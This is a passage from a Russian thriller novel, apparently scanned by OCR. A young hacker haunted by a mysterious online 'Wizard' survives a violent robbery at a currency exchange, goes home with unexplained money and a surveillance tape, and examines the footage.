грузку - на всякий случай, зная, что все это обходится достаточно элементарно). 

- Полтергейст... Барабашка хренов завелся, - безо всяких эмоций произнес Loader, глядя на 
комп, застывший в ожидании пароля. - Формат Це этому барабашке. .. 

Он поднялся на ноги и издалека взглянул на системный блок, стоявший под столом у самой 
стены, опутанный довольно пыльными проводами. Ничего особенного в нем он не увидел и сде- 
лал несколько шагов к столу. 

«Щелк!» Loader вздрогнул. На экране в прямоугольнике пароля появилась звездочка. Ноги ха- 
кера приросли к полу. И снова - «щелк!». 

Loader увидел, как на клавиатуре запала и вновь вернулась в прежнее положение клавиша К. 
На экране появилась вторая звездочка. 

- Skywalker, - прошептал Loader пароль. - Сейчас будет «игрек». 

Так и случилось. Третий «щелк» пришелся именно на Y. Тут Loader поймал себя на TOM, что 
из уголка рта стекает тоненькая струйка слюны. 

Щелчки стали чаще - некто, «барабашка», приноровился и оставшиеся шесть букв набрал до- 
статочно быстро. Девять звездочек выстроились в поле для пароля; Loader ощутил биение сво- 
его сердца в ушах - пульс просто гремел в голове, сопровождая каждое сокращение сердца 
ударом прибоя о берег. 

Однако нажатия «Enter» Loader не дождался. Складывалось впечатление, что тот, кто набрал 
пароль, предлагал хозяину компьютера самому продолжить запуск системы, тем самым проде- 
монстрировать согласие на диалог. 

Ничего не оставалось, как сделать оставшиеся три шага и самому утопить клавишу «Enter». 
Loader сделал это, находясь в состоянии зомбирования; все, что происходило сейчас в его 
квартире, - происходило не с ним. 

Система загрузилась. Из автозагрузки вылез «аськин» детектор Сети, после чего само собой 
установилось соединение (Loader этому уже не удивился). 

«Тук-тук!» 

Ослабевшие ноги голодного Loader’a подогнулись, он упал на стул и ткнул «мышкой» в экран. 
«Привет. Это опять Wizard. Как здоровье?» 

Loader угрюмо перечитал текст сообщения несколько раз; в нем закипала злость. 
«Зашибись». 

«Не понял вас. Кстати, как там поживают ваши деньги? Судя по всему, вы должны были потра- 
тить их с пользой для себя». 

Хакер машинально повернулся к шкафу, после чего вновь взглянул на экран. 

«Откуда ты знаешь о деньгах?» 

«Я много чего знаю. Извините...» 

«Уж очень часто ты извиняешься! - подумал Loader и принялся в который раз перебирать в 
голове людей, могущих быть информированными о последней его работе. - Ни на кого не по- 
хоже...» 

Манера общения была, действительно, несколько странной - сложно было сказать, является ли 
вежливость собеседника его естественной чертой или все это напускное, с целью изменения 
представления о контактере. Очень сложно разгадывать подобные загадки, видя только строч- 
ки очередного сообщения на экране. 

Периодически Loader проглядывал всю историю диалога с Wizard’om, пытаясь представить это 
в виде быстротечного разговора в реальности. Ему рисовался призрак какого-то студента-гу- 
манитария, отягощенного излишними манерами. Но все умозрительные образы таяли, стоило лишь 
вспомнить, как сами собой нажимались кнопки на клавиатуре. 

«Ты где?» - напрямую спросил Loader, не надеясь на ответ. 

«Далеко». 

Loader хмыкнул. А что еще можно было ожидать? Но тут пришло продолжение: 

«Далеко - но не только географически. Довольно сложно представить...» 

Хакер немного задумался. Все это стало напоминать ему какую-то плохую фантастику с путе- 
шествиями во времени. 

«Прошлое? Будущее?» - спросил Loader. 

«Ни то, ни другое». 

Студент-гуманитарий постепенно растаял. Собеседник довольно хорошо владел литературной ре- 
чью, при этом грамотно показывая интонации безо всякой помощи «смайликов», очень точно 
вставляя многоточия и тире. У хакера было несколько друзей с подобной манерой общения в 
Сети - и все они не подходили на роль Дэвида Копперфильда, будучи не в состоянии нажимать 
клавиши на клавиатуре на расстоянии. 

«Не буду вас долго задерживать - к вам сейчас пытается дозвониться один ваш знакомый». 
Собеседник ушел офф-лайн. Loader хотел было отправить ему какое-нибудь ругательское по- 
слание, но передумал. Ему стало интересно, кто бы это мог хотеть с ним поговорить, поэто- 
му он тоже отключился - и в ту же секунду пришел входящий звонок. 

Loader аккуратно, медленно протянул руку к телефонной трубке, поднял ee и услышал до 60- 
ли знакомый голос одного из своих постоянных заказчиков: 

- Не спишь? Есть работа... 

Прижав трубку ухом к плечу, Loader быстро набросал данные по работе в текстовый файл, по- 
сле чего положил трубку на место, повторил про себя условия работы несколько раз, после 
чего стер файл, применив утилиту уничтожения - жизнь диктовала хакерам свои законы. 
Работа предстояла довольно сложная. Можно сказать, одна из экстремальных - взлом одного 
из отделений частного «Кодекс-Банка». Заказчик просил узнать кое-что о перемещении неко- 
торых сумм в определенном направлении - «волновался» за конкурентов. В пространные объяс- 
нения такие люди обычно не пускаются, но порой и по самой задаче можно определить, в чем 
конкретно они заинтересованы. 
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Работа предстояла довольно сложная - взлом одного из отделений частного « Кодекс-Банка» . 


Loader прикинул примерное время, которое он затратит на ра- 
боту, потом поделил все это на ту сумму, которую в завуа- 
лированной форме ему пообещали, - и получил довольно выгод- 
ную во всех отношениях десятичную дробь, означающую, что в 
час хакер заработает около ста восьмидесяти долларов. До- 
вольно неплохо - при условии, что все получится в заплани- 
рованные сроки. 

И тут, подсчитав все возможные убытки и прибыли, Loader за- 
думался над тем, как быстро он смирился с тем, что в его 
жизни появился самый настоящий «виртуальный» собеседник; 
такой, о котором не мечтали даже погруженные в Диптаун ге- 
рои Лукьяненко. Появился некто, способный просто фантасти- 
ческими способами вступать в контакт через Интернет, застав- 
ляя компьютер оппонента включаться на расстоянии. Происхо- 
дило то, что всегда заставляло Loader’a скептически усме- 
хаться; его, в силу природного недоверия, всегда кривило при 
упоминании «полтергейстов» и явлений, схожих с ним. Но тут 
он на своей шкуре ощутил, как бегают мурашки при запуске 
компа, когда ты находишься от него на расстоянии в несколь- 
ко метров и даже не помышляешь нажать Ha «Power». 

Loader поднялся, прошел на кухню и заглянул в морозилку - 
пива, конечно же, там не было, он сделал это больше для по- 
рядка, чтобы подготовить себя к тому, что на улицу выйти 
все-таки придется. Составив в голове примерный план быстро- 
го рейда в продуктовый маркет в ста метрах от дома, он на- 
кинул на плечи куртку и на пороге понял, что в доме нет рус- 
ских денег. Доллары для наших магазинов были неразменной мо- 
нетой; хакер прищурился и вытащил из глубин памяти адрес 
ближайшего обменного пункта - получался приличный крюк. 
Кинув взгляд на монитор, на котором бурлил Ниагарский водо- 
пад, Loader попытался представить, что сейчас делает его не- 
видимый собеседник - не решит ли он вставить палки в коле- 
са во время прогулки? Не хотелось бы, оказавшись на улице, 
попасть в лапы к очень любопытным людям в погонах... Вздох- 
HyB, Loader поднял воротник и вышел на осенний проспект. 
Попинывая опавшую листву, хакер быстрыми шагами двигался по 
направлению к ближайшему обменнику. На улице было малолюд- 
но; Loader, выходя на улицу, даже не посмотрел на время, 
поэтому был немного удивлен теми сумерками, которые уже сгу- 
щались над городом. С его ритмом жизни в этом не было ни- 
чего необычного - но почему-то именно сегодня он задумался 
над тем, как он живет. Интернет заменил ему все - и ново- 
сти, и любовь, подарил работу и заработок, сделал независи- 
мым от погоды и экономики, от родителей и президента. До 
сегодняшнего дня его все устраивало, но какой-то Wizard no- 
шатнул равновесие, напомнив слова Экзюпери - «Нет в мире ра- 
дости больше, чем радость человеческого общения». Где те лю- 
ди, с которыми можно было поговорить? Есть ли те, кому он 
сам будет интересен? 

Полтора месяца назад Loader’y исполнилось двадцать три го- 
да. Он уже успел окончить институт (с трудом вспоминая, ка- 
кой - да это его и не интересовало, все экзамены по дистан- 
ционной форме обучения он сдал, взломав собственный форму- 
ляр и напичкав его оценками и зачетами на четыре года впе- 
ред; слава самодовольным админам!) Он распрощался с двумя 
девушками; три расстались с ним. За плечами были несколько 
языков программирования и английский со словарем (правда, 
что касалось технических терминов, то их он читал с листа, 
переводя целыми страницами). Мать с отцом где-то в глубин- 
ке; брат сидит (уж очень любил выращивать марихуану - так 
в своем поселке он называл обыкновенную коноплю; за это и 
поплатился свободой). Где та радость, которую проповедовал 
французский летчик, успев за свою короткую жизнь подарить 
миру «Маленького принца»? 

Иногда исподлобья он пытался вглядываться в лица проходящих 
мимо людей - безуспешно; в их глазах найти ответ было не- 
возможно, каждый нес в себе целый мир, не собираясь делить- 
ся им ни с кем. [оадег угрюмо покачал головой на ходу: 
«Интересно, если бы они знали, что у меня дома десять штук 
баксов, стали бы они разговаривать со мной?» 

В кармане зазвонила мобила, отключенная за неуплату три ме- 
сяца назад (сапожник без сапог...). Loader удивленно выта- 
щил ее, откинул панельку и прочитал SMS-Ky: «Нет». Вот Te- 
бе и ответ... 

К подобному комментарию своих мыслей он отнесся очень спо- 
койно, впустив «барабашку» к себе безо всяких проблем и пре- 


дубеждений. Некто был в состоянии общаться при помощи любо- 
го электронного прибора, будь то комп или сотовый телефон. 
Loader был даже готов к тому, что скоро с ним заговорят хо- 
лодильник и телевизор. Сам он в глубине души был даже рад, 
что наконец-то нашелся кто-то, пусть даже паранормальный, 
кто ищет с ним общения. 

- The truth is out there... - довольно громко сказал он в 
молчащую трубку, вспомнив девиз необычайно популярного се- 
риала. 

- Мау Бе... - шепнул кто-то издалека. Loader улыбнулся - у 
него появился друг. 

Тем временем приблизились двери обменного пункта. Даже не 
взглянув на «сэндвич» с курсом покупки-продажи, поблескива- 
ющий каплями прошедшего недавно дождя, он прошел мимо чело- 
века в кожаном плаще, стоящего почти в самом проходе. Тот 
подвинулся - правда, самую малость, но этого было достаточ- 
но, чтобы Loader оказался внутри. Дверь мягко затворилась 
без стука, хлопка и скрипа. 


На экране было хорошо видно, как Loader опешил от того, что 
обнаружил внутри. Двое людей в масках и кожаных куртках, на- 
ставив пистолеты - один на охранника, другой в окошко кас- 
сира, - грабили обменный пункт. Охранник сидел в углу, не- 
естественно подломив правую ногу и испуганно глядя на ствол, 
заканчивающийся глушителем. На груди у него расплывалось 
свежее блестящее пятно крови - грабители вошли сюда практи- 
чески за минуту перед хакером. 

Рука прошлась над экраном в красивом пассе - немного умень- 
шилась яркость. Четче стало видно лица - как преступников, 
так и Loader’a, застывшего на пороге. Сделать шаг назад ему 
не дали. 

Из-за спины в маленькую комнатку, в которой находился об- 
менник, шагнул третий - тот, с улицы, достал из-под плаща 
помповое ружье и воткнул ствол Loader’y между лопаток. 
Человек у экрана с интересом наблюдал за происходящим. Угол- 
ки его губ тронула усмешка - он особым способом скрестил 
пальцы на левой руке и что-то тихо прошептал себе под нос, 
наклонившись к самому экрану, отчего на нем появилось ма- 
ленькое запотевшее пятнышко... 


Loader застыл, раскрыв рот. Преступники же, казалось, были 
готовы к подобному повороту событий. Тот парень, что держал 
на прицеле охранника, вытащил из-за пазухи еще один писто- 
лет и направил его хакеру в лоб. Тогда ружье за спиной опу- 
стилось, и на плечо Loader’y легла жесткая сильная ладонь. 
Тем временем в окошке кассы продолжалась передача денег из 
сейфа в спортивную сумку. 

- Тихо, парень, - почти прошептали Loader’y из-за спины. - 
Ты чего пришел? 

- Деньги поменять... - хрипло произнес Loader, искренне уди- 
вившись собственному голосу. 

- Давай, я поменяю, - рука соскользнула с плеча, и Loader 
увидел перед собой ладонь левой руки в черной кожаной пер- 
чатке. Скосив взгляд в сторону, хакер встретился глазами с 
охранником, терпящим, судя по всему, сильнейшую боль - ря- 
дом с ним уже натекла довольно большая лужа крови. Взгляд 
раненого говорил об одном - «Делай, что говорят, чтобы все 
это кончилось...» Парню явно нужен был хирург и как можно 
быстрее. 

Loader сунул руку в карман куртки и собрался было вытащить 
несколько двадцаток, взятых с собой, но неожиданно нащупал 
в кармане какой-то небольшой целлофановый пакет, которого 
там точно быть не должно. И в тот же миг он понял - по то- 
му, как немного сильнее стала давить на плечи куртка - что 
и в другом кармане лежит что-то подобное. Дыхание перехва- 
тило, он попытался разыграть из себя дурачка, ищущего по 
карманам деньги, но было поздно - услышав тихое шуршание в 
кармане, бандит схватил его за предплечье и задержал руку. 
Пальцы непроизвольно сжались в кулак и обхватили пакет. 

За спиной что-то стукнуло об пол, после чего вторая рука 
потянула Loader’a на себя. Наружу показался пакет, напол- 
ненный долларами - видны были сложенные в пачки купюры по 
десять и двадцать долларов. Двое преступников - тот, что 
держал под прицелом охранника, и TOT, кто вытащил у Loader’a 
пакет из кармана, - присвистнули от удивления. 
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Loader 
почувствовал, 
как тело над ним 
в момент 
выстрела 
вздрогнуло, 
словно 
наткнувшись на 
столб, после чего 
сквозь плащ 
брызнула кровь. 
Как грабитель 
наткнулся на 
свой собственный 
ствол, осталось за 
пределами 
понимания - 
Loader даже 

не стал 
задумываться 
над этим. Он 
нашарил под 
телом убитого 
ружье и цепко 
схватил его. 


- Слушай, Буратино, у тебя еще есть? - спросили у Loader’a. Тот непонимающим взглядом смо- 
трел на пакет; где-то внутри зрела мысль, которую он всеми силами старался отогнать от се- 
бя, как назойливую муху. 

- Ну-ка, подними руки! - требовательно произнес налетчик, опустивший пистолет, направленный 
в лоб охраннику, и подошел вплотную к хакеру. Loader подчинился. И тогда из другого карма- 
на куртки тот вытащил второй пакет, являющийся полной копией первого. Там тоже было полно 
баксов. 

Теперь уже отвлекся даже тот грабитель, что упаковывал сейчас спортивную сумку, набитую при- 
мерно наполовину долларами и рублями. Он жестом показал, чтобы пакеты были упрятаны внутрь 
сумки, куда те и были отправлены. В полной тишине звук закрывающейся «молнии» на сумке был 
очень громким; кассирша за тонированным стеклом громко всхлипнула от испуга. 

Loader, не отрываясь, смотрел на сумку, которую грабитель закинул на плечо; стволом своего 
пистолета налетчик ткнул в сторону двери. 

«Это мои деньги... - про себя произнес Loader. - Это мои десять штук. Но я же не брал их с 
собой!..» Он точно помнил, как сунул в карман пять двадцаток - пять бумажек серо-зеленого 
цвета; он помнил, что остальные деньги лежали в шкафу, в коробке из-под обуви в двух цел- 
лофановых пакетах - в точно таких же пакетах... И он точно знал, что в сумке, висящей на 
плече у идущего к двери налетчика, лежит его гонорар за последнюю работу - деньги, на ко- 
торые он планировал купить «Макинтош»; что каким-то непостижимым образом они оказались в его 
карманах и сейчас уплывают в неизвестном направлении. И тогда Loader закричал и прыгнул на 
спину идущему последним вооруженному помповым ружьем налетчику. 

Тот уже спрятал ствол за полу плаща и нападения не ожидал. Толчок сбил его с ног; путаясь 
в плаще, он попытался сохранить равновесие и выпустил оружие из рук. Они упали на пол и по- 
катились, сцепившись; внезапно грохнул выстрел. 

Loader почувствовал, как тело над ним в момент выстрела вздрогнуло, словно наткнувшись на 
столб, после чего сквозь плащ брызнула кровь. Как грабитель наткнулся на свой собственный 
ствол, осталось за пределами понимания - Loader даже не стал задумываться над этим. Он на- 
шарил под телом убитого ружье и цепко схватил его. 

Все это произошло за какую-то пару секунд. Шедший вторым преступник, не разбираясь в том, 
что случилось за спиной, резко обернулся и выстрелил. Пуля просвистела почти в метре от ле- 
жащих на полу людей и раскрошила китайский пластик стены с плакатом «Опасайтесь подделок!». 
Выдернув ружье из-под трупа, Loader направил его на стрелка и нажал спусковой крючок. Спас- 
ло его лишь то, что в момент выдергивания «помпы» затвор передернулся сам - сделать это од- 
ной рукой (вторая была намертво придавлена к полу почти стокилограммовой тушей мертвого те- 
ла) он наверняка бы не сумел. Пламя, вырвавшееся из ствола, на секунду скрыло лицо нападав- 
шего; дым, последовавший за выстрелом, заволок наполовину помещение обменника. 

Loader четко слышал крик, сопровождающий выстрел, - крик боли и ужаса; потом последовал звук 
падения, кто-то упал на пол - молча, словно сил кричать хватило только на миг. 

Мозг лихорадочно и с абсолютно непонятной настойчивостью фиксировал все происходящее вокруг. 
Вот за стеной в кассе зазвонил телефон; на улице завыла «сигналка» чьей-то недалеко припар- 
кованной машины; натужно зашелся в кашле раненый охранник. Сквозь плотное облачко порохово- 
го дыма Loader увидел алый глазок видеокамеры, фиксировавший все происходящее в помещении; 
объектив был неподвижно направлен на лежащие тела. 

И в этот миг из дыма Ha Loader’a надвинулась фигура человека со спортивной сумкой. Ствол пи- 
столета, направленный в лицо, ничего хорошего не предвещал. Хакер дернул пальцем спусковой 
крючок - ничего не произошло, без перезарядки эта штука не стреляла. Страх кольнул где-то в 
подреберье, заставив перебирать ногами; но выбраться не получалось, уж очень тяжелыми ста- 
новятся люди после смерти. 

Однако это немного помогло Loader’y - щелчок глушителя и последующий за ним свист пули не 
достали его; из пола рядом с головой парня полетели какие-то стружки, не то деревянные, не 
то пластиковые. Следующий выстрел заставил дернуться уже мертвое тело; пуля пробила правое 
плечо мертвеца и вновь не задела Loader’a. 

Третий выстрел достиг цели. Однако прогремел он почему-то очень громко, будто и не было ни- 
какого глушителя. Loader зажмурил глаза - и не почувствовал ничего, ни боли, ни удара. А по- 
том рядом раздался грохот - сначала металлический, потом упал человек. 

Открывать глаза Loader не решался. Он не мог поверить в то, что он жив; примерно минуту, 
затаив дыхание, он неподвижно лежал, потом приоткрыл глаза и попытался оглядеться. 

Рядом с ним на полу лежал пистолет с глушителем; ствол смотрел прямо на Loader’a. Однако 
стрелять из него было некому - хозяин оружия сидел, привалившись спиной к входной двери, и 
тяжело хрипел, прижимая руки к животу. Из-под перчаток несколькими тонкими ручейками выте- 
кала кровь. Глядя перед собой широко раскрытыми глазами, налетчик вдруг задышал все быстрей 
- и через секунду сполз по двери набок, упав на пол. Дыхание стало поверхностным и внезап- 
но остановилось. 

Откуда-то из-за головы раздался булькающий кашель; потом еще один пистолет упал на пол. 
Loader собрался с силами и выполз-таки из-под мертвеца, отвалив его в сторону, - тот с шу- 
MOM перевернулся, показав Loader’y простреленный живот. Парень встал на колени и посмотрел 
туда, откуда донесся кашель. 

Охранник сидел в той же позе, что и минуту назад; его остекленевшие глаза смотрели прямо пе- 
ред собой. Судя по всему, он умер только что, в последний раз кашлянув простреленным лег- 
ким. А в дальнем углу - там, где был зарешеченный вход в кассу - стояла молодая, лет двад- 
цати, кассирша; у ее ног валялся табельный «Макаров». Она судорожно всхлипывала - практиче- 
ски неслышно, одними губами; ее глаза были неподвижно прикованы к убитому ею преступнику, 
лежащему сейчас у входа. 

Loader аккуратно, чтобы не испугать девушку резкими движениями, встал и жестом показал ей, 
что все в порядке. Она не отреагировала на это; судя по всему, ей был нужен психиатр. Па- 
рень медленно сделал несколько шагов к убитому у двери, снял с плеча сумку с деньгами и от- 
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Он вытащил из сумки два пакета с деньгами, торопливо заглянул в них, чбеждаясь вих реальности. 


крыл ее. Звук «молнии» вывел девушку из ступора, она закри- 
чала - пронзительно, на одном дыхании. 

- Тихо, тихо, - не оборачиваясь, прошептал Loader. Он ждал 
этого крика с того самого момента, как увидел убитого ею 
преступника, поэтому ничуть не испугался и не удивился. - Я 
только возьму свое... 

Он вытащил из сумки два пакета с деньгами, торопливо загля- 
нул в них, убеждаясь в их реальности. Доллары были на мес- 
те. Loader засунул их за пазуху, не особо заботясь о том, 
чтобы банкноты не помялись, после чего распрямился и повер- 
нулся к кассирше, на секунду прервавшей свой крик, чтобы 
вдохнуть. 

- Заткнись, - коротко сказал он ей. Девушка замерла на вы- 
соте вдоха с высоко поднявшейся грудью и, выпучив глаза, ис- 
пуганно посмотрела на Loader’a. Она неожиданно для себя по- 
няла, что этот парень, застреливший двух грабителей, может 
оказаться ничуть не лучше - вполне можно ожидать от него 
какой-нибудь мерзости. 

Loader догадался, о чем она подумала, по выражению ее 
глаз, в которых за мгновенье промелькнула вся ее короткая 
жизнь. Он кивнул в сторону сумки: 

- Там все, что ты им выложила. От тебя мне нужна только ви- 
деокассета с записью с камеры наблюдения - будь любезна, вы- 
неси мне ее из кассы. А потом я скажу тебе, что делать даль- 
ше. 

Девушка быстро, со свистом, выдохнула. По-видимому, она 
только и ждала, чтобы кто-нибудь сказал, что ей делать в 
данной ситуации - и моментально стало легче переносить весь 
кошмар, окруживший ее. Она вбежала в кассу, там что-то не- 
громко щелкнуло, и в окошке показалась ее рука с видеокас- 
сетой. Loader взял кассету, после чего произнес: 

- Запомни - ты и твой охранник сделали все это. На вас на- 
пали, вы защищались. Кассету сегодня вы вставить забыли. Я 
думаю, что ты еще получишь премию от хозяина - за свой вы- 
стрел. Забыл сказать «спасибо» - он был весьма кстати. 
Повернувшись к дверям, Loader перешагнул застреленного из 
ружья преступника, подошел к двери и собрался выходить, но 
в последний момент вернулся на несколько шагов назад и под- 
нял с пола пистолет с глушителем. 

На улице он непринужденно оглянулся по сторонам, убедившись, 
что никто не обратил на него внимания, после чего выкинул 
отвинченный глушитель в мусорный контейнер, а пистолет при- 
ятно оттягивал ему карман - вместе с десятью тысячами дол- 
ларов. Он шел домой - а человек за экраном задумчиво смот- 
рел сквозь глазок видеокамеры на трупы в центре обменного 
пункта и разочарованно качал головой. Через несколько се- 
кунд он щелкнул перед собой пальцами - и кассирша на экра- 
не упала в обморок... 


Закрыв за собой дверь, Loader вспомнил, что так и не попал 
в магазин. Но чувство голода куда-то ушло, предоставив ме- 
сто адреналиновому шоку - расслабились и затряслись руки и 
ноги, подгибаясь абсолютно безо всякого участия со стороны 
хакера. Он сумел сделать несколько шагов в комнату и упал 
на диван - тело стало воздушным, сердце выскакивало из гру- 
ди, норовя нырнуть куда-то в горло. 

Лежа на спине, он кое-как сумел освободиться от куртки, ки- 
нув на пол пакеты деньгами и пистолет; после этого он за- 
крыл глаза и попытался выровнять дыхание. 

Пять минут назад он совершил то, о чем всегда втайне меч- 
тал и боялся совершить, - он убил человека. Одного - точно 
сам, второго - случайно, но тоже можно записать на свой 
счет. Перед его глазами проносились картины короткой, про- 
сто молниеносной сцены в обменном пункте - дым от выстре- 
лов, пороховая гарь, брызги крови на стенах, кричащая дев- 
чонка с «Макаровым». 

- Уорнер Бразерз... - хрипло прошептал Loader. - Двадцатый 
век Фокс... 

Почему-то все его видения заканчивались одним - перед гла- 
зами вновь и вновь возникал мертвый охранник с прострелен- 
ной грудью, которому не хватило нескольких минут для того, 
чтобы остаться в живых. Взгляд этого несчастного парня был 
самым жутким воспоминанием из всего, что Loader’y пришлось 
пережить сегодня. 

... Очнулся Гоадег через несколько часов, под утро. Пережи- 
вания утомили его, он проспал как убитый, без сновидений, 


храпя и вздрагивая, пуская слюну себе на плечо и не заме- 
чая всего этого. Из объятий сна его вырвало нечто, заста- 
вившее резко подскочить и испуганно оглядеться. Скорее все- 
го, это был сон - из тех, от которых не остается и следа, 
кроме ощущения того, что ты не только не отдохнул, но еще 
больше устал. 

Уняв сердцебиение, он оглядел комнату, погруженную в темно- 
ту. В лунном свете, прорывающемся с улицы, тускло поблески- 
вал целлофан пакетов. Рядом угадывалось черное пятно писто- 
лета. Скинув с ног куртку, которой он, по-видимому, засы- 
пая, машинально накрылся, Loader спустил ноги на пол, про- 
тянул руки к одному из пакетов и поднял его с пола, разгля- 
дывая так, как покупатели смотрят на пакетик с золотой рыб- 
кой, покупаемой в зоомагазине, - на вытянутой руке, издале- 
ка. Ему все еще не верилось в то, что деньги, оставленные 
в шкафу, чудесным образом переместились к нему в карманы за 
полкилометра от дома. 

Но это были они - те самые купюры, которые он пересчитывал, 
когда с ним впервые связался Wizard. Те самые деньги... 
Loader задумался, задумался крепко, как над неразрешимой за- 
дачей. Он знал твердо - то, что случилось в обменном пунк- 
те (не стрельба, нет!), - не могло произойти в принципе, 
иначе очень многие вещи теряли в этой жизни смысл, а пара- 
нормальные явления занимали главенствующее положение. 
Loader был научен самим своим ремеслом - ничего в этой жиз- 
ни не происходит по щучьему веленью. Каждая его победа над 
Сетью была результатом кропотливого труда; еще ни один байт 
не переместился с его компьютера на чужой безо всякого уча- 
стия со стороны хакера. Если бы это было возможно, то боль- 
шинство нерешенных задач наконец-то оказались разгаданными. 
Какая-то сила сегодня переместила в пространстве десять ты- 
сяч долларов, переложив их из шкафа в карман Loader’a. Ско- 
рее всего, это та же самая сила, что сумела включить его 
компьютер на расстоянии. Загадочный Wizard играл с ним в 
прятки. 

Рассуждая на эту тему, Loader поднялся и включил в комнате 
свет. Люстра осветила беспорядок, который Loader учинил, 
вбежав в квартиру; свет заставил на мгновение зажмуриться. 
Привыкнув к иллюминации, парень осмотрел квартиру, скривил- 
ся, увидев на куртке кровавые пятна («Придется расстать- 
ся...»); потом решительно поднял с пола второй пакет с день- 
гами, распахнул шкаф и кинул их вглубь - туда, где они и 
лежали до сегодняшнего инцидента, после чего притворил дверь 
и собрался было сесть за компьютер, но что-то его остано- 
вило. 

Несколько секунд он размышлял над тем, что же он захотел 
сделать. У него было ощущение «дежа-вю» - то, что происхо- 
дило с ним сейчас, уже было когда-то. Два дня назад он точ- 
но так же подошел к шкафу и довольно небрежно кинул деньги 
туда, к обувным коробкам. Вот и сегодня - он кинул их ту- 
да, не глядя. 

Он резко развернулся и рванул на себя дверцу шкафа. 

Все было именно так, как он и увидел, бросая пакеты - про- 
сто он не смог сразу себе это объяснить, потому и закрыл 
дверцу, устроив игру с собственной памятью... 

В шкафу лежали ЧЕТЫРЕ пакета, наполненных долларами. Он при- 
нес из обменника ЧУЖИЕ деньги. 

Loader протянул руку и вытащил один из пакетов - он уже не 
помнил, какой из них он принес домой сегодня, а какой по- 
ложил туда два дня назад. Деньги в нем были настоящие - это 
было видно Loader’y и без всяких приборов, он перевидал Ha 
своем веку кучу фальшивых денег. Эти были самими настоящи- 
ми - дальше некуда. Вынув несколько купюр из пакета, Loader 
рассмотрел их поближе - ничего особенного не было. 

Постояв соляным столбом несколько минут, хакер высыпал со- 
держимое пакетов на пол и принялся искать купюры с одина- 
ковыми номерами. Что-то подсказывало ему, что это проделки 
Wizard’a - Loader просто мечтал найти такие деньги, чтобы 
успокоить воспаленный рассудок. Но тщетно, все эти долларо- 
вые банкноты были разными. 

Хакер, устав рыться в деньгах, со злости подбросил их в воз- 
дух; баксы медленно кружились в воздухе и падали на пол, на 
шкаф, на компьютерный стол, на диван, устилая все денежным 
ковром стоимостью в двадцать тысяч долларов. И ему бы ра- 
доваться - да не было сил и желания. 
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Он вспоминал, 
как из-за спины 
ему протянул 
руку грабитель, 
как он сам полез 
в карман... 

И в эту секунду 
четко стало 
видно, 

как карманы 
его куртки 
незначительно 
надуваются, 
словно изнутри в 
них накачали 
воздух. Именно 
тогда в них 
появились 
деньги! 


Он сидел на полу, обхватив руками голову, чувствуя нежные шуршащие прикосновения долларов, 
и раскачивался из стороны в сторону. Кто этот проклятый Wizard и что за эксперимент он над 
ним проводит? 

И тут он увидел видеокассету - ее край выглядывал из-за подкладки куртки, куда Loader сунул 
ее, вынося из обменного пункта. Это была та самая кассета, на которой он убивал двух гра- 
бителей - на ней могло быть видно, откуда взялись эти неведомые тысячи в карманах у хаке- 
ра. 

Loader подскочил, как ужаленный, и, разрывая подкладку, выдернул кассету на свет и воткнул 
ее в магнитофон. Перематывать пришлось довольно долго - судя по всему, кассета записывалась 
на скорости «Long Play» и могла содержать около шести часов видеозаписи. Боясь что-либо про- 
пустить, хакер начал издалека, почти с самого начала. 

Достаточно быстро ему надоели люди, бесконечной чередой входящие в обменник и выходящие из 
него. Охранник лениво перемещался по комнате, ничем не занимаясь. Деньги исчезали в окошке 
кассы и появлялись оттуда вновь. Таймер в углу экрана показывал, что до ограбления остава- 
лось около часа. 

Пустив запись на перемотке вперед, Loader чуть не проморгал момент, когда налетчики ворва- 
лись в комнату. Охранник в тот момент сидел в углу у журнального столика и читал какую-то 
книгу - это его и погубило. Когда у тебя заняты руки, трудно быстро выхватить пистолет из 
кобуры - на экране он попытался подняться со стула, но почти мгновенно получил пулю в грудь, 
его отбросило к противоположной стене, где его и увидел вошедший через шесть минут (по тай- 
меру) Loader. 

В этот момент - буквально перед появлением хакера в комнате - на экране что-то мигнуло, слов- 
HO на долю секунды вырубилось питание. Но напряженный Loader этого не заметил, продолжая 
всматриваться в происходящее. 

Вот он появляется... Вот следом входит человек в плаще и приставляет к его спине ружье... 
Loader будто заново переживал все это, ощутив между лопаток холодное прикосновение ствола. 
Запись была без звука, но хакер явственно слышал и вопрос, обращенный к нему, и свои соб- 
ственные слова: «Деньги поменять...» 

Он вспоминал, как из-за спины ему протянул руку грабитель, как он сам полез в карман... И 
в эту секунду четко стало видно, как карманы его куртки незначительно надуваются, словно из- 
нутри в них накачали воздух. Именно тогда в них появились деньги! 

Loader резко нажал «паузу» и подошел поближе, после чего отмотал на пару секунд назад и вновь 
детально рассмотрел все, что видел только что. Действительно, деньги появлялись в его кар- 
манах не сразу, а только перед тем, как он хотел достать из куртки купюры, взятые с собой 
для размена. 

- Ну я же не дурак! - крикнул сам себе Loader. - Не брал я их с собой, не брал! Чертов 
Wizard! 

Расхаживая перед телевизором из сторону в сторону и ругая на чем свет стоит устроившего этот 
полтергейст Wizard’a, Loader пропустил все то, чем закончилась перестрелка. Остановился он 
только тогда, когда на экране зашумели помехи. 

Поглядывая на бегущие по экрану рваные черно-серые полосы, он понял, что искренне рад тому, 
что не видел, как вышиб мозги бандиту, стрелявшему в него. Но, в очередной раз взглянув на 
заполненный помехами экран, он заметил какое-то несоответствие, вначале неуловимое, но по- 
том постепенно обретшее свое название. 

У Loader’a появилось ощущение, что после того как на телевизоре побежали помехи, его экран 
стал НЕМНОГО БОЛЬШЕ. После лишних десяти тысяч долларов он уже ничему не удивлялся. 

Хакер отмотал запись назад на десять-пятнадцать минут, включил воспроизведение. Ничего осо- 
бенного не произошло. Вновь та же сцена ограбления, драка, стрельба, кровь. Потом помехи - 
и диагональ неуловимо вырастает... 

Loader перемотал еще раз. Тот же результат. И тогда он принес из кухни сантиметровую ленту. 
После ряда измерений он вычислил, что разница составляет примерно один сантиметр. И нако- 
нец-то стало понятно, почему эта разница появилась. 

Во время просмотра видеозаписи по всему периметру экрана была черная полоса толщиной в не- 
сколько миллиметров. Loader прокручивал запись туда-сюда и пытался понять, откуда она взя- 
лась. Увлекся он настолько, что не заметил, как вновь включился компьютер и сам собой на- 
брался пароль. 

- Что за черт, - размышлял вслух хакер. - Камера снимает комнату, по краю кадра не должно 
быть ничего лишнего, а тут такое ощущение, будто... 

И вдруг он замолчал, пораженный собственной догадкой. Он наконец-то понял, что именно он ви- 
дит перед собой - что-то, напоминающее пиратскую копию фильма, снятую с телевизора. Та чер- 
ная полоса, которая обвивала изображение, была пластиковым кантом вокруг экрана, на котором 
